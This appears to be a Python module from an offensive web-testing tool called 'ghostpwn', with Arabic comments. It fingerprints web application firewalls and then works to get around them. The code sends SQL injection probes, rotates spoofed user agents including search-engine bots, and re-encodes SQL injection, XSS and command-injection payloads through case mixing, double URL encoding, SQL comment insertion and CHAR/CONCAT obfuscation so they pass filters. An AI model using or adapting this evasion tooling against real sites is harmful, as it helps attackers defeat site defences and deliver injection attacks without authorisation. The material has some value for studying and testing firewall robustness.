#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
ghostpwn - Smart WAF Detector & Evasion
كشف ذكي لـ WAF مع auto-evasion و termination آمن

الذكاء:
1. يكشف نوع الـ WAF من الـ response
2. لو الـ WAF بدأ يحظر، يحاول evasion techniques
3. لو الاستمرار خطر، ينهي الفحص بأمان
4. يرجّع تقرير واضح للـ user
"""
import sys
import os
import time
import random
import urllib.parse
from typing import Dict, List, Optional, Tuple

sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))

from modules.http_client import HttpClient
from modules.arabic_display import SmartLogger, Colors, fix_display


# ============================ WAF Signatures ============================
WAF_SIGNATURES = {
    "Cloudflare": {
        "headers": ["cf-ray", "cf-cache-status", "__cf_bm", "server: cloudflare"],
        "body": ["cloudflare", "cf-browser-verification", "attention required"],
        "block_status": [403, 503, 429],
        "block_headers": {"cf-mitigated": "challenge"},
    },
    "AWS WAF": {
        "headers": ["x-amzn-waf", "x-amz-cf-id", "x-amz-request-id"],
        "body": ["aws waf", "request blocked"],
        "block_status": [403],
    },
    "ModSecurity": {
        "headers": ["server: mod_security", "x-mod-security"],
        "body": ["mod_security", "modsecurity", "not acceptable"],
        "block_status": [403, 406],
    },
    "F5 BIG-IP": {
        "headers": ["server: bigip", "x-cnection", "tsig_"],
        "body": ["the requested url was rejected", "big-ip"],
        "block_status": [403],
    },
    "Imperva": {
        "headers": ["incap_ses", "visid_incap", "x-iinfo", "x-cdn: imperva"],
        "body": ["incapsula", "incident id"],
        "block_status": [403, 406],
    },
    "Akamai": {
        "headers": ["akamai", "x-akamai-transformed", "_abck"],
        "body": ["akamai", "access denied"],
        "block_status": [403, 429],
    },
    "Sucuri": {
        "headers": ["server: sucuri", "x-sucuri-id", "x-sucuri-cache"],
        "body": ["sucuri", "access denied"],
        "block_status": [403],
    },
    "Wordfence": {
        "headers": ["x-wf-"],
        "body": ["wordfence", "generated by wordfence"],
        "block_status": [403, 429],
    },
    "Citrix": {
        "headers": ["ns_af", "citrix", "x-citrix"],
        "body": ["citrix netscaler"],
        "block_status": [403],
    },
    "Barracuda": {
        "headers": ["barra_counter_session", "server: barracuda"],
        "body": ["barracuda"],
        "block_status": [403],
    },
    "Fortinet": {
        "headers": ["fortinet", "fortiwaf"],
        "body": ["fortinet", "fgt_block"],
        "block_status": [403],
    },
    "Generic WAF": {
        "headers": [],
        "body": ["blocked", "forbidden", "rejected", "request denied"],
        "block_status": [403, 406, 418, 429],
    },
}


# ============================ Evasion Techniques ============================
EVASION_USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (Linux; Android 13; SM-S918B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
    "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
]


class WAFPayloadEncoder:
    """تشفير payloads لتخطي WAF"""

    @staticmethod
    def case_variation(payload: str) -> str:
        """تغيير حالة الأحرف"""
        result = ""
        for i, c in enumerate(payload):
            if c.isalpha():
                result += c.upper() if i % 2 == 0 else c.lower()
            else:
                result += c
        return result

    @staticmethod
    def url_encode(payload: str) -> str:
        """URL encoding"""
        return urllib.parse.quote(payload, safe="")

    @staticmethod
    def double_url_encode(payload: str) -> str:
        """Double URL encoding"""
        return urllib.parse.quote(urllib.parse.quote(payload, safe=""), safe="")

    @staticmethod
    def insert_comments(payload: str) -> str:
        """إدراج comments (لـ SQL)"""
        sql_keywords = ["SELECT", "UNION", "FROM", "WHERE", "AND", "OR"]
        result = payload
        for kw in sql_keywords:
            if kw in result.upper():
                idx = result.upper().index(kw)
                result = result[:idx+2] + "/**/" + result[idx+2:]
        return result

    @staticmethod
    def use_whitespaces(payload: str) -> str:
        """استبدال المسافات بـ variations"""
        variations = ["\t", "\n", "\r", "/**/", "%20", "+"]
        result = ""
        for c in payload:
            if c == " ":
                result += random.choice(variations)
            else:
                result += c
        return result

    @staticmethod
    def use_concat(payload: str) -> str:
        """استخدام CONCAT (لـ SQL)"""
        if "'" in payload:
            parts = payload.split("'")
            if len(parts) >= 3:
                concat_parts = []
                for part in parts:
                    if part:
                        chars = ",".join(str(ord(c)) for c in part)
                        concat_parts.append(f"CHAR({chars})")
                return "CONCAT(" + ",".join(concat_parts) + ")"
        return payload

    @staticmethod
    def encode_payload(payload: str, technique: str) -> str:
        """تطبيق تقنية تشفير"""
        encoders = {
            "case": WAFPayloadEncoder.case_variation,
            "url": WAFPayloadEncoder.url_encode,
            "double_url": WAFPayloadEncoder.double_url_encode,
            "comments": WAFPayloadEncoder.insert_comments,
            "whitespaces": WAFPayloadEncoder.use_whitespaces,
            "concat": WAFPayloadEncoder.use_concat,
        }
        encoder = encoders.get(technique)
        if encoder:
            return encoder(payload)
        return payload


# ============================ Smart WAF Detector ============================
class SmartWAFDetector:
    """كشف ذكي لـ WAF مع auto-evasion"""

    def __init__(self, http_client: HttpClient, audit_logger=None):
        self.client = http_client
        self.audit = audit_logger
        self.logger = SmartLogger()

        # تتبع الحالة
        self.waf_detected = False
        self.waf_name = None
        self.blocked_count = 0
        self.success_count = 0
        self.total_requests = 0
        self.block_threshold = 3  # لو 3 طلبات متتالية محظورة = WAF نشط
        self.auto_evasion_enabled = True
        self.evasion_techniques_used = []
        self.should_terminate = False

    def _log(self, msg, level="info"):
        """logging"""
        getattr(self.logger, level, self.logger.info)(msg)
        if self.audit:
            self.audit.log_event(f"[WAF] {msg}", level)

    def detect_waf(self, url: str) -> Dict:
        """كشف WAF من response عادي"""
        self._log("فحص وجود WAF...", "info")

        # طلب عادي
        normal_resp = self.client.get(url)

        # طلب بـ payload مشبوه
        attack_url = url + ("&" if "?" in url else "?") + "id=1'+OR+'1'='1"
        attack_resp = self.client.get(attack_url)

        self.total_requests += 2

        detected_waf = None
        detection_method = None

        # فحص headers للـ response العادي
        all_headers = {**normal_resp["headers"], **attack_resp["headers"]}
        all_headers_lower = {k.lower(): v.lower() for k, v in all_headers.items()}

        for waf_name, sigs in WAF_SIGNATURES.items():
            for sig in sigs.get("headers", []):
                sig_lower = sig.lower()
                for h_name, h_val in all_headers_lower.items():
                    if sig_lower in h_name or sig_lower in h_val:
                        detected_waf = waf_name
                        detection_method = f"Header: {sig}"
                        break
                if detected_waf:
                    break
            if detected_waf:
                break

        # فحص body
        if not detected_waf:
            for waf_name, sigs in WAF_SIGNATURES.items():
                for sig in sigs.get("body", []):
                    if sig.lower() in normal_resp["body"].lower() or \
                       sig.lower() in attack_resp["body"].lower():
                        detected_waf = waf_name
                        detection_method = f"Body: {sig}"
                        break
                if detected_waf:
                    break

        # فحص status code
        if not detected_waf:
            if attack_resp["status"] in [403, 406, 418, 429, 503] and \
               normal_resp["status"] == 200:
                detected_waf = "Generic WAF"
                detection_method = f"Status: {attack_resp['status']} on attack"

        if detected_waf:
            self.waf_detected = True
            self.waf_name = detected_waf
            self._log(f"WAF مكتشف: {detected_waf} ({detection_method})", "warn")
        else:
            self._log("لا يوجد WAF - الموقع غير محمي", "info")

        return {
            "detected": self.waf_detected,
            "name": detected_waf,
            "method": detection_method,
            "normal_status": normal_resp["status"],
            "attack_status": attack_resp["status"],
        }

    def check_blocked(self, response: Dict) -> bool:
        """فحص إذا كان الـ response يشير لحظر"""
        # status codes تشير للحظر
        if response["status"] in [403, 406, 418, 429, 503]:
            self.blocked_count += 1
            return True

        # فحص body لرسائل حظر
        block_indicators = [
            "blocked", "forbidden", "rejected", "request denied",
            "access denied", "not acceptable", "rate limit",
            "too many requests", "blocked by", "security rule",
        ]
        body_lower = response["body"].lower()
        for indicator in block_indicators:
            if indicator in body_lower:
                self.blocked_count += 1
                return True

        # لو وصلنا هنا = نجح الطلب
        self.success_count += 1
        self.blocked_count = 0  # reset
        return False

    def should_evade(self) -> bool:
        """هل نحتاج evasion؟"""
        if self.blocked_count >= self.block_threshold:
            return True
        return False

    def apply_evasion(self) -> str:
        """تطبيق تقنية evasion ورجوع اسمها"""
        if not self.auto_evasion_enabled:
            return None

        techniques = []

        # 1. تبديل User-Agent
        old_ua = self.client.user_agent
        new_ua = random.choice(EVASION_USER_AGENTS)
        self.client.user_agent = new_ua
        techniques.append(f"UA: {new_ua[:50]}...")

        # 2. زيادة delay
        if self.client.delay < 3.0:
            self.client.delay = random.uniform(2.0, 5.0)
            techniques.append(f"delay: {self.client.delay:.1f}s")

        # 3. إضافة headers إضافية
        self.client.session_cookies.setdefault("ghostpwn_session", str(random.randint(10000, 99999)))

        technique_str = " | ".join(techniques)
        self.evasion_techniques_used.append(technique_str)
        self._log(f"تطبيق evasion: {technique_str}", "warn")

        return technique_str

    def encode_payload_for_waf(self, payload: str) -> List[str]:
        """توليد versions مشفرة من payload"""
        variations = [payload]  # الأصلي أولاً

        techniques = ["case", "url", "double_url", "comments", "whitespaces", "concat"]

        for technique in techniques:
            try:
                encoded = WAFPayloadEncoder.encode_payload(payload, technique)
                if encoded != payload:
                    variations.append(encoded)
            except Exception:
                continue

        return variations

    def safe_request(self, url: str, method: str = "GET",
                     data=None, headers=None) -> Optional[Dict]:
        """طلب آمن مع auto-evasion"""

        # فحص لو لازم ننهي
        if self.should_terminate:
            self._log("تم إنهاء الفحص بسبب حظر WAF المستمر", "error")
            return None

        # تنفيذ الطلب
        resp = self.client.request(url, method, data, headers)
        self.total_requests += 1

        # فحص الحظر
        if self.check_blocked(resp):
            self._log(f"طلب محظور (status: {resp['status']})", "warn")

            # لو وصلنا للـ threshold، نطبق evasion
            if self.should_evade():
                self._log("تنشيط وضع التخفي...", "warn")
                self.apply_evasion()

                # إعادة المحاولة بعد evasion
                time.sleep(random.uniform(3, 7))  # انتظار عشوائي

                resp = self.client.request(url, method, data, headers)
                self.total_requests += 1

                if self.check_blocked(resp):
                    self._log("ما زال محظوراً بعد evasion", "error")

                    # لو اتسجل 7 مرات حظر = خطر، ننهي
                    if self.blocked_count >= 7:
                        self._log("حظر مستمر - إنهاء آمن للفحص", "error")
                        self.should_terminate = True
                        return None
                else:
                    self._log("نجح الطلب بعد evasion", "success")

        return resp

    def get_status(self) -> Dict:
        """حالة الـ WAF detector"""
        return {
            "waf_detected": self.waf_detected,
            "waf_name": self.waf_name,
            "total_requests": self.total_requests,
            "blocked_count": self.blocked_count,
            "success_count": self.success_count,
            "evasion_techniques_used": self.evasion_techniques_used,
            "should_terminate": self.should_terminate,
            "current_delay": self.client.delay,
            "current_ua": self.client.user_agent,
        }

    def reset(self):
        """إعادة تعيين الحالة"""
        self.blocked_count = 0
        self.success_count = 0
        self.should_terminate = False


# ============================ Smart Request Wrapper ============================
class SmartRequestWrapper:
    """wrapper للـ HTTP client مع WAF detection"""

    def __init__(self, http_client: HttpClient, waf_detector: SmartWAFDetector):
        self.client = http_client
        self.waf = waf_detector

    def get(self, url: str, headers=None) -> Optional[Dict]:
        return self.waf.safe_request(url, "GET", headers=headers)

    def post(self, url: str, data=None, headers=None) -> Optional[Dict]:
        return self.waf.safe_request(url, "POST", data=data, headers=headers)

    def is_terminated(self) -> bool:
        """هل تم إنهاء الفحص؟"""
        return self.waf.should_terminate


if __name__ == "__main__":
    # اختبار
    import argparse
    parser = argparse.ArgumentParser(description="ghostpwn - Smart WAF Detector")
    parser.add_argument("--url", required=True)
    parser.add_argument("--test-evasion", action="store_true")
    args = parser.parse_args()

    client = HttpClient(timeout=10)
    detector = SmartWAFDetector(client)

    result = detector.detect_waf(args.url)
    print(f"\nResult: {result}")

    if args.test_evasion:
        print(f"\nTesting evasion on attack payloads...")
        payloads = ["' OR '1'='1", "<script>alert(1)</script>", ";id"]
        for payload in payloads:
            print(f"\nOriginal: {payload}")
            variations = detector.encode_payload_for_waf(payload)
            for i, v in enumerate(variations[:3], 1):
                print(f"  Variation {i}: {v}")
